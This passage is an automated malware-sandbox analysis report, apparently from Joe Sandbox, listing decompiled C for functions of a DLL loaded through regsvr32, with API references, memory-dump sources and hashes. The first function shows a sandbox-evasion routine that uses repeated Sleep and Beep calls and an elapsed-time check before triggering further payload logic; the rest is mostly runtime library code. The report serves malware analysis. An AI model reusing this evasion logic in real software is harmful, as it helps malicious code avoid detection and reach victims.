				intOrPtr _v48;
				char _v304;
				signed char _t32;
				char _t46;
				char _t47;

				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				_v12 = 0;
				_v28 = 0xa;
				_t32 = E6F6C5D90(__eflags); // executed
				if((_t32 & 0x000000ff) == 0) {
					L15:
					__eflags = 0;
					return 0;
				} else {
					_v5 = 0;
					_v36 = E6F6C26D0(L"Kernel32.dll", 0);
					_v32 = E6F6C3D10(E6F6C4E80( &_v5));
					_v36(_v32,  &_v304, 0x100);
					_v20 =  *((intOrPtr*)(E6F6C2220(L"Kernel32.dll", 0)))();
					L2:
					if(_v12 < _v28) {
						_v40 = E6F6C22E0(L"Kernel32.dll", 0);
						Sleep(0x1770);
						_v44 = E6F6C2580(L"Kernel32.dll", 0);
						Beep(0, 0xbb8);
						_v12 = _v12 + 1;
						goto L2;
					}
					_v16 =  *((intOrPtr*)(E6F6C2220(L"Kernel32.dll", 0)))();
					_v24 = _v16 - _v20;
					__eflags = _v24 - 0xd6d8;
					if(_v24 < 0xd6d8) {
						goto L15;
					}
					__eflags = _v12 - _v28;
					if(__eflags < 0) {
						goto L15;
					}
					_t46 = E6F6C7700(__eflags);
					__eflags = _t46;
					if(_t46 == 0) {
						return 1;
					}
					_t47 = E6F6C69A0( &_v304);
					__eflags = _t47;
					if(_t47 != 0) {
						__eflags = E6F6C7670();
						if(__eflags == 0) {
							_v48 = E6F6C7770();
							__eflags = _v48 - 1;
							if(_v48 == 1) {
								__eflags = E6F6C71E0();
								if(__eflags == 0) {
									E6F6C6390(__eflags);
								} else {
									E6F6C6390(__eflags);
								}
							}
						} else {
							E6F6C6390(__eflags);
						}
					}
					goto L15;
				}
			}

0x6f6c8a99
0x6f6c8aa0
0x6f6c8aa7
0x6f6c8aae
0x6f6c8ab5
0x6f6c8abc
0x6f6c8ac6
0x6f6c8bd9
0x6f6c8bd9
0x00000000
0x6f6c8acc
0x6f6c8ace
0x6f6c8add
0x6f6c8aef
0x6f6c8b02
0x6f6c8b13
0x6f6c8b16
0x6f6c8b1c
0x6f6c8b2a
0x6f6c8b32
0x6f6c8b41
0x6f6c8b4b
0x6f6c8b54
0x00000000
0x6f6c8b54
0x6f6c8b67
0x6f6c8b70
0x6f6c8b73
0x6f6c8b7a
0x00000000
0x00000000
0x6f6c8b7f
0x6f6c8b82
0x00000000
0x00000000
0x6f6c8b84
0x6f6c8b89
0x6f6c8b8b
0x00000000
0x6f6c8b8d
0x6f6c8b9d
0x6f6c8ba2
0x6f6c8ba4
0x6f6c8bab
0x6f6c8bad
0x6f6c8bbb
0x6f6c8bbe
0x6f6c8bc2
0x6f6c8bc9
0x6f6c8bcb
0x6f6c8bd4
0x6f6c8bcd
0x6f6c8bcd
0x6f6c8bcd
0x6f6c8bcb
0x6f6c8baf
0x6f6c8baf
0x6f6c8baf
0x6f6c8bad
0x00000000
0x6f6c8ba4

APIs

Part of subcall function 6F6C5D90: LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6F6C5EBF

Sleep.KERNELBASE(00001770,Kernel32.dll,00000000), ref: 6F6C8B32
Beep.KERNELBASE(00000000,00000BB8,Kernel32.dll,00000000), ref: 6F6C8B4B

Strings

Kernel32.dll, xrefs: 6F6C8AD3, 6F6C8B07, 6F6C8B20, 6F6C8B37, 6F6C8B5B

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: BeepLibraryLoadSleep
String ID: Kernel32.dll
API String ID: 1352138507-1926710522
Opcode ID: efb6c25eff884ce618d959a64aa8bbcd539f471937233bd0fe8a8b2b734e027b
Instruction ID: 6a87e48921910d31a8b7c9c2f3fd72c963c4034722e371c56066183426c22cb8
Opcode Fuzzy Hash: efb6c25eff884ce618d959a64aa8bbcd539f471937233bd0fe8a8b2b734e027b
Instruction Fuzzy Hash: AF311EB0D44309ABEB10DBF989457EEB7B0EF46304F104456D595B61C0EBB5AA408BAB

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CFD93 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F6CFD93(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6F6CFD5C(_t26) - _t26 >> 1;
					_t7 = E6F6CFCA5(0, 0, _t26, E6F6CFD5C(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6F6CE649(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6F6CFCA5(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6F6CDC0E(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x6f6cfda2
0x6f6cfda8
0x6f6cfe03
0x6f6cfe03
0x6f6cfdaa
0x6f6cfdb8
0x6f6cfdbe
0x6f6cfdc6
0x6f6cfdcb
0x00000000
0x6f6cfdcd
0x6f6cfdce
0x6f6cfdd3
0x6f6cfdd8
0x6f6cfdf8
0x6f6cfdf2
0x6f6cfdf2
0x6f6cfdf4
0x6f6cfdf4
0x6f6cfdfb
0x6f6cfe00
0x6f6cfdcb
0x6f6cfe07
0x6f6cfe0a
0x6f6cfe0a
0x6f6cfe16

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F6CFD9C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F6CFE0A

Part of subcall function 6F6CFCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6F6CE286,6F6D12A9,0000FDE9,00000000,?,?,?,6F6D1022,0000FDE9,00000000,?), ref: 6F6CFD51

Part of subcall function 6F6CE649: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6F6D0272,?,00000000,?,6F6CD4C9,?,00000004,?,?,?,?,6F6CCFC7), ref: 6F6CE67B

_free.LIBCMT ref: 6F6CFDFB

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 51d4f833d01a17d05d2d5489a600b08bf3c557c46b2e341dc10f348421226d6c
Instruction ID: e2cc53efe3feb0e2387dacb73204b0284919a012fa9ecfba4dedd9be208519b6
Opcode Fuzzy Hash: 51d4f833d01a17d05d2d5489a600b08bf3c557c46b2e341dc10f348421226d6c
Instruction Fuzzy Hash: 1901A7B26017517FB71115BF5C88CBB396DCDC69A4315022ABE50D6141EF50ED0191F7

Uniqueness

Uniqueness Score: -1.00%

Function 6F6C92F6 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E6F6C92F6(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6F6C9960(__ebx, __edi, __esi);
				_t43 = E6F6C8F8C(__ecx, __edx, 0); // executed
				_t90 = 0x6f6da5d0;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6F6C8E91();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6f6dcfc8;
					if( *0x6f6dcfc8 != 0) {
						E6F6C9839(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6f6da5f0);
						E6F6C9960(1, __edi, __esi);
						_t48 =  *0x6f6dcfec; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6f6dcfec = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6F6C8E91();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6f6dcfc8 - 2;
							if( *0x6f6dcfc8 != 2) {
								E6F6C9839(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6f6da618);
								E6F6C9960(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6F6C95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6F6C92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_push(_t110);
											_push( *((intOrPtr*)(_t123 + 8)));
											_t56 = E6F6C9A40();
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_push(_t56);
													_push( *((intOrPtr*)(_t123 + 8)));
													_t59 = E6F6C9A40();
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6F6C95B8( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6F6C92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6F6C95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6f6dcfec - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6F6C8F5C(1, _t90, 1, _t113);
								E6F6C9A52();
								E6F6C9AB3();
								 *0x6f6dcfc8 =  *0x6f6dcfc8 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6F6C9492();
								_t67 = E6F6C90FE( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6F6C949F();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6f6dcfc8 = 1;
						if(E6F6C8EEE(_t132) != 0) {
							E6F6C9A46(E6F6C9A87());
							E6F6C9A64();
							_t80 = E6F6CD38A(0x6f6d51fc, 0x6f6d520c);
							_pop(_t102);
							if(_t80 == 0 && E6F6C8EC3(1, _t102) != 0) {
								E6F6CD345(_t102, 0x6f6d51bc, 0x6f6d51f8);
								 *0x6f6dcfc8 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6F6C93D9();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6F6C9A81();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6F6C904D(_t85, _t106, _t121, _t138) != 0) {
									 *0x6f6d51b8( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6f6dcfec =  *0x6f6dcfec + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6f6c92f6
0x6f6c92f6
0x6f6c92f6
0x6f6c92f6
0x6f6c92fd
0x6f6c9304
0x6f6c9309
0x6f6c930c
0x6f6c93e3
0x6f6c93e3
0x6f6c93e3
0x00000000
0x6f6c9312
0x6f6c9317
0x6f6c931a
0x6f6c931c
0x6f6c931f
0x6f6c9323
0x6f6c932a
0x6f6c93f7
0x6f6c93fc
0x6f6c93fd
0x6f6c93ff
0x6f6c9404
0x6f6c9409
0x6f6c940e
0x6f6c9410
0x6f6c9417
0x6f6c941f
0x6f6c9422
0x6f6c942b
0x6f6c942e
0x6f6c9431
0x6f6c9438
0x6f6c94a7
0x6f6c94ac
0x6f6c94ad
0x6f6c94af
0x6f6c94b4
0x6f6c94b9
0x6f6c94bc
0x6f6c94be
0x6f6c94cf
0x6f6c94cf
0x6f6c94d3
0x6f6c94d6
0x6f6c94e2
0x6f6c94e2
0x6f6c94ef
0x6f6c94f1
0x6f6c94f4
0x6f6c94f6
0x6f6c9501
0x6f6c9506
0x6f6c9508
0x6f6c950b
0x6f6c950d
0x00000000
0x00000000
0x6f6c950d
0x6f6c94d8
0x6f6c94d8
0x6f6c94db
0x00000000
0x6f6c94dd
0x6f6c94dd
0x6f6c9513
0x6f6c9513
0x6f6c9514
0x6f6c9515
0x6f6c9518
0x6f6c951d
0x6f6c951f
0x6f6c9522
0x6f6c9525
0x6f6c9527
0x6f6c9529
0x6f6c952b
0x6f6c952c
0x6f6c952d
0x6f6c9530
0x6f6c9535
0x6f6c9537
0x6f6c9537
0x6f6c953d
0x6f6c953e
0x6f6c9543
0x6f6c9549
0x6f6c9549
0x6f6c9529
0x6f6c954e
0x6f6c9550
0x6f6c9557
0x6f6c9561
0x6f6c9563
0x6f6c9566
0x6f6c9568
0x6f6c9574
0x6f6c959c
0x6f6c959c
0x6f6c9552
0x6f6c9552
0x6f6c9555
0x00000000
0x00000000
0x6f6c9555
0x6f6c9550
0x6f6c94db
0x6f6c959f
0x6f6c95a6
0x6f6c94c0
0x6f6c94c0
0x6f6c94c6
0x00000000
0x6f6c94c8
0x6f6c94c8
0x6f6c94c8
0x6f6c94c6
0x6f6c95ab
0x6f6c95b7
0x6f6c943a
0x6f6c943a
0x6f6c943f
0x6f6c9444
0x6f6c9449
0x6f6c9450
0x6f6c9454
0x6f6c945e
0x6f6c946a
0x6f6c946c
0x6f6c946c
0x6f6c946e
0x6f6c9471
0x6f6c9478
0x6f6c947d
0x00000000
0x6f6c947d
0x6f6c9412
0x6f6c9412
0x6f6c947f
0x6f6c9482
0x6f6c948e
0x6f6c948e
0x6f6c9330
0x6f6c9330
0x6f6c9341
0x6f6c9348
0x6f6c934d
0x6f6c935c
0x6f6c9362
0x6f6c9365
0x6f6c937a
0x6f6c9381
0x6f6c938b
0x6f6c938d
0x6f6c938d
0x6f6c9365
0x6f6c9390
0x6f6c9397
0x6f6c939e
0x00000000
0x6f6c93a0
0x6f6c93a5
0x6f6c93a7
0x6f6c93aa
0x6f6c93ac
0x6f6c93b5
0x6f6c93c3
0x6f6c93c9
0x6f6c93c9
0x6f6c93b5
0x6f6c93cb
0x6f6c93d3
0x6f6c93d3
0x6f6c93e5
0x6f6c93e8
0x6f6c93f4
0x6f6c93f4
0x6f6c932a

APIs

__RTC_Initialize.LIBCMT ref: 6F6C9343

Part of subcall function 6F6C9A46: InitializeSListHead.KERNEL32(6F6DD000,6F6C934D,6F6DA5D0,00000010,6F6C92DE,?,?,?,6F6C9506,?,00000001,?,?,00000001,?,6F6DA618), ref: 6F6C9A4B

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F6C93AD

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 6a6c8236682579c0f71ad2630ad2f74383e7dc254f7fef2396d6d2f0062cbb2b
Instruction ID: 3f6c95e00e75e680dbf6960b758a2c304cf9fd499c0ed9b6c8384d0c83d01131
Opcode Fuzzy Hash: 6a6c8236682579c0f71ad2630ad2f74383e7dc254f7fef2396d6d2f0062cbb2b
Instruction Fuzzy Hash: ED21D332649705EEDB10ABB888407DC3F61EF1732DF10051AD4D96B2C9CF365444C6AB

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CCC7D Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F6CCC7D(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6f6ccc82

APIs

Part of subcall function 6F6CFD93: GetEnvironmentStringsW.KERNEL32 ref: 6F6CFD9C
Part of subcall function 6F6CFD93: _free.LIBCMT ref: 6F6CFDFB
Part of subcall function 6F6CFD93: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F6CFE0A

_free.LIBCMT ref: 6F6CCCBD
_free.LIBCMT ref: 6F6CCCC4

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 9ea1437a76272141d82eb6b8fff5b81bd7557e81b24bdae328643a706c9bd6eb
Instruction ID: 03cbf2f86272499844da25a187bb6a87f230900f1b97400d6e60e7a204aa74d7
Opcode Fuzzy Hash: 9ea1437a76272141d82eb6b8fff5b81bd7557e81b24bdae328643a706c9bd6eb
Instruction Fuzzy Hash: AAE02B73989A4005E321277E7E50699163ACFC233CB110317DAA1CB1C0DFA0C40205AB

Uniqueness

Uniqueness Score: -1.00%

Function 6F6D1368 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E6F6D1368(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E6F6CDC48(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E6F6CDF9B(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E6F6CDC0E(0);
				return _t35;
			}

0x6f6d136e
0x6f6d1375
0x6f6d137a
0x6f6d137e
0x6f6d1385
0x6f6d138b
0x6f6d138b
0x6f6d1391
0x6f6d1393
0x6f6d1396
0x6f6d1396
0x6f6d1399
0x6f6d139b
0x6f6d13a1
0x6f6d13a5
0x6f6d13aa
0x6f6d13ae
0x6f6d13b2
0x6f6d13b4
0x6f6d13b7
0x6f6d13bd
0x6f6d13c4
0x6f6d13c8
0x6f6d13cb
0x6f6d13ce
0x6f6d13ce
0x6f6d13d2
0x6f6d13d5
0x6f6d1387
0x6f6d1387
0x6f6d1387
0x6f6d13d7
0x6f6d13e2

APIs

Part of subcall function 6F6CDC48: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F6CDB5E,00000001,00000364,00000007,000000FF,?,6F6CD4C9,?,00000004,?,?,?), ref: 6F6CDC89

_free.LIBCMT ref: 6F6D13D7

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 716a2e087b80e6653e6404b20a790e259c2d0bc5f3646a07caadb649c0b7d408
Instruction ID: c3f847feca5ad87d8a032e3903385d8cd6e1a36c535360aaf025827641d67e8d
Opcode Fuzzy Hash: 716a2e087b80e6653e6404b20a790e259c2d0bc5f3646a07caadb649c0b7d408
Instruction Fuzzy Hash: C201F9B26483166BD3218F69C8849DDFBACFF453B0F150629F565B7AC0E7B0A811C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CDC48 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F6CDC48(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6f6dd9d8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6F6D0684();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6F6CD46D(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6F6CC4BB(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6f6cdc4e
0x6f6cdc53
0x6f6cdc61
0x6f6cdc61
0x6f6cdc67
0x6f6cdc69
0x6f6cdc69
0x6f6cdc80
0x6f6cdc89
0x6f6cdc91
0x00000000
0x00000000
0x6f6cdc71
0x6f6cdc73
0x6f6cdc95
0x6f6cdc9a
0x6f6cdca0
0x00000000
0x6f6cdca0
0x6f6cdc7c
0x6f6cdc7e
0x00000000
0x00000000
0x6f6cdc7e
0x00000000
0x6f6cdc80
0x6f6cdc59
0x6f6cdc5f
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F6CDB5E,00000001,00000364,00000007,000000FF,?,6F6CD4C9,?,00000004,?,?,?), ref: 6F6CDC89

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e239a6dd05a1c0f59d0e706568a659fb1f834d35b24f23c1d74cf91bde3af24e
Instruction ID: 80882fc271e543dc6355951bee96ff4b9478442d254b56a5a18ca18a25e2b898
Opcode Fuzzy Hash: e239a6dd05a1c0f59d0e706568a659fb1f834d35b24f23c1d74cf91bde3af24e
Instruction Fuzzy Hash: BAF0B431680B2466EB115A269D04A9A376EDF82774F048113EEB9DF180CBA0E80386A2

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CE649 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F6CE649(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6F6CD46D(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6f6dd9d8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6F6D0684();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E6F6CC4BB(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6f6ce64f
0x6f6ce655
0x6f6ce687
0x6f6ce68c
0x6f6ce692
0x00000000
0x6f6ce692
0x6f6ce659
0x6f6ce65b
0x6f6ce65b
0x6f6ce672
0x6f6ce67b
0x6f6ce683
0x00000000
0x00000000
0x6f6ce663
0x6f6ce665
0x00000000
0x00000000
0x6f6ce66e
0x6f6ce670
0x00000000
0x00000000
0x6f6ce670
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6F6D0272,?,00000000,?,6F6CD4C9,?,00000004,?,?,?,?,6F6CCFC7), ref: 6F6CE67B

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e8b0df0e6ef322cf0c78ac3d1d976687ce010d6789d2f39d6afa88a9f202ee70
